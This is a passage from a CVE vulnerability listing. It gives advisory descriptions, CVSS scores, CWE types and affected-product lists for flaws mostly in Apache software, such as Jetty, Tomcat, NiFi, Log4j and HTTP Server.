eclipse jetty 10.0.0
eclipse jetty *
oracle communications_offline_mediation_controller 12.0.0.3.0
oracle siebel_core_-_automation *
oracle communications_pricing_design_center 12.0.0.3.0
oracle blockchain_platform *
oracle hyperion_infrastructure_technology 11.1.2.6.0
oracle flexcube_private_banking 12.0.0
apache spark 3.0.3
netapp oncommand_system_manager *
oracle flexcube_private_banking 12.1.0
oracle communications_converged_application_server_-_service_controller 6.2
CVE-2020-27223 MEDIUM

In Eclipse Jetty 9.4.6.v20170531 to 9.4.36.v20210114 (inclusive), 10.0.0, and 11.0.0 when Jetty handles a request containing multiple Accept headers with a large number of “quality” (i.e. q) parameters, the server may enter a denial of service (DoS) state due to high CPU usage processing those quality values, resulting in minutes of CPU time exhausted processing those quality values.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4
emo@eclipse.org 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-407,CWE-400,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
apache solr 8.8.1
netapp e-series_santricity_web_services -
oracle rest_data_services *
netapp snapcenter -
debian debian_linux 10.0
netapp hci -
netapp management_services_for_element_software -
eclipse jetty 11.0.0
eclipse jetty 10.0.0
netapp e-series_santricity_os_controller *
eclipse jetty *
netapp element_plug-in_for_vcenter_server -
apache spark 3.1.1
eclipse jetty 9.4.6
eclipse jetty 9.4.36
netapp solidfire -
apache nifi 1.13.0
netapp snapmanager -
netapp hci_management_node -
CVE-2020-28052 MEDIUM

An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle communications_application_session_controller 3.9m0p3
oracle communications_cloud_native_core_network_slice_selection_function 1.2.1
oracle communications_convergence 3.0.2.2.0
oracle communications_session_route_manager *
oracle jd_edwards_enterpriseone_tools *
oracle commerce_guided_search 11.3.2
oracle banking_corporate_lending_process_management 14.3.0
oracle banking_supply_chain_finance 14.3.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_credit_facilities_process_management 14.3.0
oracle banking_virtual_account_management 14.2.0
oracle utilities_framework 4.4.0.0.0
oracle communications_session_report_manager *
bouncycastle bc-java 1.66
bouncycastle legion-of-the-bouncy-castle-java-crytography-api 1.65
oracle peoplesoft_enterprise_peopletools 8.58
oracle banking_credit_facilities_process_management 14.5.0
oracle banking_extensibility_workbench 14.2.0
oracle communications_pricing_design_center 12.0.0.3.0
oracle blockchain_platform *
oracle banking_virtual_account_management 14.5.0
oracle peoplesoft_enterprise_peopletools 8.57
oracle utilities_framework 4.3.0.6.0
oracle banking_supply_chain_finance 14.2.0
apache karaf 4.3.2
oracle webcenter_portal 12.2.1.3.0
oracle banking_extensibility_workbench 14.5.0
oracle utilities_framework 4.4.0.3.0
oracle banking_extensibility_workbench 14.3.0
oracle webcenter_portal 12.2.1.4.0
oracle banking_corporate_lending_process_management 14.5.0
oracle communications_messaging_server 8.0.2
bouncycastle bc-java 1.65
oracle peoplesoft_enterprise_peopletools 8.56
oracle banking_corporate_lending_process_management 14.2.0
oracle banking_supply_chain_finance 14.5.0
bouncycastle legion-of-the-bouncy-castle-java-crytography-api 1.66
oracle banking_credit_facilities_process_management 14.2.0
oracle communications_messaging_server 8.1
oracle banking_virtual_account_management 14.3.0
oracle utilities_framework 4.4.0.2.0
CVE-2020-35451 LOW

There is a race condition in OozieSharelibCLI in Apache Oozie before version 5.2.1 which allows a malicious attacker to replace the files in Oozie's sharelib during it's creation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N 1.0 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-377,CWE-362,

Products Affected

Vendor Product Version
apache oozie *
CVE-2020-35452 MEDIUM

Apache HTTP Server versions 2.4.0 to 2.4.46 A specially crafted Digest nonce can cause a stack overflow in mod_auth_digest. There is no report of this overflow being exploitable, nor the Apache HTTP Server team could create one, though some particular compiler and/or compilation option might make it possible, with limited consequences anyway due to the size (a single byte) and the value (zero byte) of the overflow

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
oracle zfs_storage_appliance_kit 8.8
debian debian_linux 10.0
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle enterprise_manager_ops_center 12.4.0.0
CVE-2020-36230 MEDIUM

A flaw was discovered in OpenLDAP before 2.4.57 leading in an assertion failure in slapd in the X.509 DN parsing in decode.c ber_next_element, resulting in denial of service.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-617,

Products Affected

Vendor Product Version
apache bookkeeper 4.12.1
apple mac_os_x *
debian debian_linux 9.0
apple macos *
apple mac_os_x 10.14.6
debian debian_linux 10.0
openldap openldap *
CVE-2020-5499 HIGH

Baidu Rust SGX SDK through 1.0.8 has an enclave ID race. There are non-deterministic results in which, sometimes, two global IDs are the same.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache rust_sgx_sdk *
CVE-2020-5529 MEDIUM

HtmlUnit prior to 2.37.0 contains code execution vulnerabilities. HtmlUnit initializes Rhino engine improperly, hence a malicious JavScript code can execute arbitrary Java code on the application. Moreover, when embedded in Android application, Android-specific initialization of Rhino engine is done in an improper way, hence a malicious JavaScript code can execute arbitrary Java code on the application.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-665,CWE-94,

Products Affected

Vendor Product Version
canonical ubuntu_linux 16.04
debian debian_linux 9.0
htmlunit htmlunit *
apache camel -
CVE-2020-8022 HIGH

A Incorrect Default Permissions vulnerability in the packaging of tomcat on SUSE Enterprise Storage 5, SUSE Linux Enterprise Server 12-SP2-BCL, SUSE Linux Enterprise Server 12-SP2-LTSS, SUSE Linux Enterprise Server 12-SP3-BCL, SUSE Linux Enterprise Server 12-SP3-LTSS, SUSE Linux Enterprise Server 12-SP4, SUSE Linux Enterprise Server 12-SP5, SUSE Linux Enterprise Server 15-LTSS, SUSE Linux Enterprise Server for SAP 12-SP2, SUSE Linux Enterprise Server for SAP 12-SP3, SUSE Linux Enterprise Server for SAP 15, SUSE OpenStack Cloud 7, SUSE OpenStack Cloud 8, SUSE OpenStack Cloud Crowbar 8 allows local attackers to escalate from group tomcat to root. This issue affects: SUSE Enterprise Storage 5 tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP2-BCL tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP2-LTSS tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP3-BCL tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP3-LTSS tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP4 tomcat versions prior to 9.0.35-3.39.1. SUSE Linux Enterprise Server 12-SP5 tomcat versions prior to 9.0.35-3.39.1. SUSE Linux Enterprise Server 15-LTSS tomcat versions prior to 9.0.35-3.57.3. SUSE Linux Enterprise Server for SAP 12-SP2 tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server for SAP 12-SP3 tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server for SAP 15 tomcat versions prior to 9.0.35-3.57.3. SUSE OpenStack Cloud 7 tomcat versions prior to 8.0.53-29.32.1. SUSE OpenStack Cloud 8 tomcat versions prior to 8.0.53-29.32.1. SUSE OpenStack Cloud Crowbar 8 tomcat versions prior to 8.0.53-29.32.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
meissner@suse.de 7.7 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 2.5 5.2
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-276,CWE-276,

Products Affected

Vendor Product Version
apache tomcat *
opensuse leap 15.1
CVE-2020-9479 MEDIUM

When loading a UDF, a specially crafted zip file could allow files to be placed outside of the UDF deployment directory. This issue affected Apache AsterixDB unreleased builds between commits 580b81aa5e8888b8e1b0620521a1c9680e54df73 and 28c0ee84f1387ab5d0659e9e822f4e3923ddc22d. Note: this CVE may be REJECTed as the issue did not affect any released versions of Apache AsterixDB

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache asterixdb *
CVE-2020-9480 HIGH

In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache spark *
oracle business_intelligence 5.5.0.0.0
CVE-2020-9481 MEDIUM

Apache ATS 6.0.0 to 6.2.3, 7.0.0 to 7.1.9, and 8.0.0 to 8.0.6 is vulnerable to a HTTP/2 slow read attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2020-9482 MEDIUM

If NiFi Registry 0.1.0 to 0.5.0 uses an authentication mechanism other than PKI, when the user clicks Log Out, NiFi Registry invalidates the authentication token on the client side but not on the server side. This permits the user's client-side token to be used for up to 12 hours after logging out to make API requests to NiFi Registry.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-613,

Products Affected

Vendor Product Version
apache nifi_registry *
CVE-2020-9483 MEDIUM

**Resolved** When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache skywalking 7.0.0
apache skywalking *
CVE-2020-9484 MEDIUM

When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.0 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.0 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle siebel_apps_-_marketing *
oracle instantis_enterprisetrack *
oracle communications_session_route_manager *
opensuse leap 15.1
oracle database 12.2.0.1
mcafee epolicy_orchestrator 5.9.0
oracle workload_manager 18c
apache tomcat 10.0.0
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle hospitality_guest_access 4.2.1
oracle communications_diameter_signaling_router *
oracle managed_file_transfer 12.2.1.4.0
oracle workload_manager 12.2.0.1
oracle communications_session_report_manager *
apache tomcat *
fedoraproject fedora 32
mcafee epolicy_orchestrator 5.9.1
oracle agile_plm 9.3.3
oracle agile_plm 9.3.5
oracle agile_plm 9.3.6
oracle fmw_platform 12.2.1.4.0
oracle mysql_enterprise_monitor *
oracle hospitality_guest_access 4.2.0
oracle communications_cloud_native_core_binding_support_function 1.10.0
oracle communications_element_manager *
oracle communications_cloud_native_core_policy 1.14.0
oracle retail_order_broker 15.0
oracle siebel_ui_framework *
mcafee epolicy_orchestrator 5.10.0
oracle database 19c
debian debian_linux 9.0
oracle fmw_platform 12.2.1.3.0
oracle workload_manager 19c
debian debian_linux 8.0
oracle transportation_management 6.3.7
oracle communications_instant_messaging_server 10.0.1.4.0
canonical ubuntu_linux 16.04
fedoraproject fedora 31
oracle managed_file_transfer 12.2.1.3.0
oracle database 21c
canonical ubuntu_linux 20.04
apache tomcat 9.0.0
CVE-2020-9485 MEDIUM

An issue was found in Apache Airflow versions 1.10.10 and below. A stored XSS vulnerability was discovered in the Chart pages of the the "classic" UI.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-9486 MEDIUM

In Apache NiFi 1.10.0 to 1.11.4, the NiFi stateless execution engine produced log output which included sensitive property values. When a flow was triggered, the flow definition configuration JSON was printed, potentially containing sensitive values in plaintext.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-532,

Products Affected

Vendor Product Version
apache nifi *
CVE-2020-9487 MEDIUM

In Apache NiFi 1.0.0 to 1.11.4, the NiFi download token (one-time password) mechanism used a fixed cache size and did not authenticate a request to create a download token, only when attempting to use the token to access the content. An unauthenticated user could repeatedly request download tokens, preventing legitimate users from requesting download tokens.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache nifi *
CVE-2020-9488 MEDIUM

Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. Fixed in Apache Log4j 2.12.3 and 2.13.1

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 3.7 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N 2.2 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
oracle insurance_rules_palette 11.0.2.25
oracle weblogic_server 10.3.6.0.0
oracle retail_eftlink 19.0.1
oracle communications_unified_inventory_management 7.4.0
oracle utilities_framework 4.4.0.0.0
oracle retail_bulk_data_integration 16.0.3.0
qos reload4j *
oracle storagetek_tape_analytics_sw_tool 2.3.1
oracle insurance_policy_administration_j2ee 10.2.4.12
oracle retail_xstore_point_of_service 18.0.3
oracle retail_xstore_point_of_service 16.0.6
oracle financial_services_price_creation_and_discovery 8.0.7
oracle insurance_policy_administration_j2ee 10.2.0.37
oracle enterprise_manager_for_peoplesoft 13.4.1.1
oracle insurance_rules_palette 11.1.0.15
oracle retail_predictive_application_server 16.0.3.0
oracle retail_order_broker_cloud_service 19.0
oracle communications_offline_mediation_controller 12.0.0.3.0
oracle retail_xstore_point_of_service 15.0.4
oracle financial_services_market_risk_measurement_and_management 8.0.6
oracle utilities_framework 2.2.0.0.0
oracle utilities_framework 4.2.0.2.0
oracle retail_integration_bus 16.0
oracle spatial_and_graph 19c
oracle storagetek_acsls 8.5.1
oracle retail_assortment_planning 16.0.3.0
oracle communications_application_session_controller 3.9m0p1
apache log4j *
oracle retail_order_broker_cloud_service 16.0
oracle flexcube_private_banking 12.0.0
oracle flexcube_core_banking 5.2.0
oracle financial_services_institutional_performance_analytics 8.7.0
debian debian_linux 11.0
oracle financial_services_market_risk_measurement_and_management 8.0.8
oracle retail_predictive_application_server 14.1.3.0
oracle insurance_rules_palette 10.2.4.12
oracle oracle_goldengate_application_adapters 19.1.0.0.0
oracle siebel_apps_-_marketing *
oracle retail_customer_management_and_segmentation_foundation 17.0
oracle retail_assortment_planning 15.0.3.0
oracle spatial_and_graph 12.2.0.1
oracle retail_eftlink 16.0.3
oracle retail_eftlink 15.0.2
oracle communications_billing_and_revenue_management 7.5.0.23.0
oracle retail_bulk_data_integration 15.0.3.0
oracle policy_automation_connector_for_siebel 10.4.6
oracle retail_customer_management_and_segmentation_foundation 18.0
oracle data_integrator 12.2.1.4.0
oracle financial_services_market_risk_measurement_and_management 8.1.0
oracle utilities_framework 4.2.0.3.0
oracle retail_order_broker_cloud_service 19.2
oracle flexcube_core_banking *
oracle insurance_rules_palette 11.2.0.26
oracle peoplesoft_enterprise_peopletools 8.57
oracle insurance_policy_administration_j2ee 11.0.2.25
oracle siebel_ui_framework *
oracle communications_services_gatekeeper 7.0
oracle insurance_insbridge_rating_and_underwriting 5.6.1.0
debian debian_linux 9.0
oracle retail_advanced_inventory_planning 14.1
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle retail_eftlink 17.0.2
oracle financial_services_institutional_performance_analytics 8.0.6
oracle insurance_insbridge_rating_and_underwriting *
oracle retail_predictive_application_server 15.0.3.0
oracle primavera_unifier 19.12
oracle retail_order_broker_cloud_service 19.1
oracle spatial_and_graph 18c
oracle financial_services_price_creation_and_discovery 8.0.6
oracle retail_customer_management_and_segmentation_foundation 19.0
oracle flexcube_private_banking 12.1.0
oracle utilities_framework 4.4.0.2.0
oracle communications_eagle_ftp_table_base_retrieval 4.5
oracle financial_services_retail_customer_analytics 8.0.6
oracle policy_automation_for_mobile_devices *
oracle financial_services_analytical_applications_infrastructure *
oracle communications_unified_inventory_management 7.3.0
debian debian_linux 10.0
oracle utilities_framework *
oracle insurance_policy_administration_j2ee 11.2.0.26
oracle peoplesoft_enterprise_peopletools 8.58
oracle policy_automation *
oracle health_sciences_information_manager 3.0.1
oracle jd_edwards_world_security a9.4
oracle retail_customer_management_and_segmentation_foundation 16.0
oracle communications_billing_and_revenue_management 12.0.0.3.0
oracle retail_order_broker_cloud_service 19.3
oracle retail_insights_cloud_service_suite 19.0
oracle retail_integration_bus 14.1
oracle retail_xstore_point_of_service 19.0.2
oracle retail_eftlink 18.0.1
oracle retail_integration_bus 15.0
oracle peoplesoft_enterprise_peopletools 8.56
oracle retail_order_broker_cloud_service 18.0
oracle financial_services_institutional_performance_analytics 8.1.0
oracle insurance_rules_palette 10.2.0.37
oracle insurance_policy_administration_j2ee 11.1.0.15
oracle data_integrator 12.2.1.3.0
CVE-2020-9489 MEDIUM

A carefully crafted or corrupt file may trigger a System.exit in Tika's OneNote Parser. Crafted or corrupted files can also cause out of memory errors and/or infinite loops in Tika's ICNSParser, MP3Parser, MP4Parser, SAS7BDATParser, OneNoteParser and ImageParser. Apache Tika users should upgrade to 1.24.1 or later. The vulnerabilities in the MP4Parser were partially fixed by upgrading the com.googlecode:isoparser:1.1.22 dependency to org.tallison:isoparser:1.9.41.2. For unrelated security reasons, we upgraded org.apache.cxf to 3.3.6 as part of the 1.24.1 release.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache tika 1.24
oracle primavera_unifier 19.12
oracle primavera_unifier 16.2
oracle webcenter_portal 12.2.1.3.0
oracle primavera_unifier *
oracle primavera_unifier 18.8
oracle primavera_unifier 16.1
oracle webcenter_portal 12.2.1.4.0
oracle communications_messaging_server 8.1
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
CVE-2020-9490 MEDIUM

Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
redhat enterprise_linux_eus 8.2
redhat enterprise_linux_server_update_services_for_sap_solutions 8.4
oracle enterprise_manager_ops_center 12.4.0.0
redhat enterprise_linux_for_ibm_z_systems_eus 8.2
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.1
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.3
redhat enterprise_linux_server_tus 8.6
redhat enterprise_linux_for_power_little_endian_eus 8.1
redhat enterprise_linux_for_power_little_endian 8.0
redhat enterprise_linux 8.0
redhat enterprise_linux_eus 8.4
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.4
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_update_services_for_sap_solutions 8.6
redhat enterprise_linux_for_power_little_endian_eus 8.2
apache http_server *
oracle communications_session_route_manager *
redhat enterprise_linux_for_ibm_z_systems_eus 8.6
opensuse leap 15.1
redhat enterprise_linux_for_power_little_endian_eus 8.4
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
redhat enterprise_linux_server_update_services_for_sap_solutions 8.1
oracle communications_session_report_manager *
fedoraproject fedora 32
redhat enterprise_linux_server_tus 8.4
redhat openstack_for_ibm_power 16.1
redhat enterprise_linux_for_ibm_z_systems_eus 8.1
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.2
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.6
redhat openstack 16.1
oracle communications_element_manager *
redhat enterprise_linux_for_ibm_z_systems 8.0
redhat enterprise_linux_for_ibm_z_systems_eus 8.4
redhat enterprise_linux_server_aus 8.6
oracle hyperion_infrastructure_technology 11.1.2.4
opensuse leap 15.2
redhat enterprise_linux_eus 8.6
redhat enterprise_linux_eus 8.1
redhat enterprise_linux_server_update_services_for_sap_solutions 8.2
redhat enterprise_linux_for_power_little_endian_eus 8.6
fedoraproject fedora 31
canonical ubuntu_linux 20.04
redhat enterprise_linux_server_aus 8.4
redhat enterprise_linux_server_aus 8.2
redhat enterprise_linux_server_tus 8.2
oracle instantis_enterprisetrack 17.2
redhat software_collections 1.0
CVE-2020-9491 MEDIUM

In Apache NiFi 1.2.0 to 1.11.4, the NiFi UI and API were protected by mandating TLS v1.2, as well as listening connections established by processors like ListenHTTP, HandleHttpRequest, etc. However intracluster communication such as cluster request replication, Site-to-Site, and load balanced queues continued to support TLS v1.0 or v1.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-327,

Products Affected

Vendor Product Version
apache nifi *
CVE-2020-9492 MEDIUM

In Apache Hadoop 3.2.0 to 3.2.1, 3.0.0-alpha1 to 3.1.3, and 2.0.0-alpha to 2.10.0, WebHDFS client might send SPNEGO authorization header to remote URL without proper verification.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache solr 8.6.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
apache solr 8.6.2
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
apache hadoop *
CVE-2020-9493 MEDIUM

A deserialization flaw was found in Apache Chainsaw versions prior to 2.1.0 which could lead to malicious code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache chainsaw *
qos reload4j *
apache log4j *
CVE-2020-9494 MEDIUM

Apache Traffic Server 6.0.0 to 6.2.3, 7.0.0 to 7.1.10, and 8.0.0 to 8.0.7 is vulnerable to certain types of HTTP/2 HEADERS frames that can cause the server to allocate a large amount of memory and spin the thread.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2020-9495 MEDIUM

Apache Archiva login service before 2.2.5 is vulnerable to LDAP injection. A attacker is able to retrieve user attribute data from the connected LDAP server by providing special values to the login form. With certain characters it is possible to modify the LDAP filter used to query the LDAP users. By measuring the response time for the login request, arbitrary attribute data can be retrieved from LDAP user objects.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache archiva *
CVE-2020-9496 MEDIUM

XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-502,

Products Affected

Vendor Product Version
apache ofbiz 17.12.03
CVE-2020-9497 LOW

Apache Guacamole 1.1.0 and older do not properly validate datareceived from RDP servers via static virtual channels. If a userconnects to a malicious or compromised RDP server, specially-craftedPDUs could result in disclosure of information within the memory ofthe guacd process handling the connection.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.4 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N 0.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
fedoraproject fedora 32
debian debian_linux 9.0
apache guacamole *
fedoraproject fedora 33
CVE-2020-9498 MEDIUM

Apache Guacamole 1.1.0 and older may mishandle pointers involved inprocessing data received via RDP static virtual channels. If a userconnects to a malicious or compromised RDP server, a series ofspecially-crafted PDUs could result in memory corruption, possiblyallowing arbitrary code to be executed with the privileges of therunning guacd process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H 0.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
fedoraproject fedora 32
debian debian_linux 9.0
apache guacamole *
fedoraproject fedora 33
CVE-2021-20190 HIGH

A flaw was found in jackson-databind before 2.9.10.7. FasterXML mishandles the interaction between serialization gadgets and typing. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,CWE-502,

Products Affected
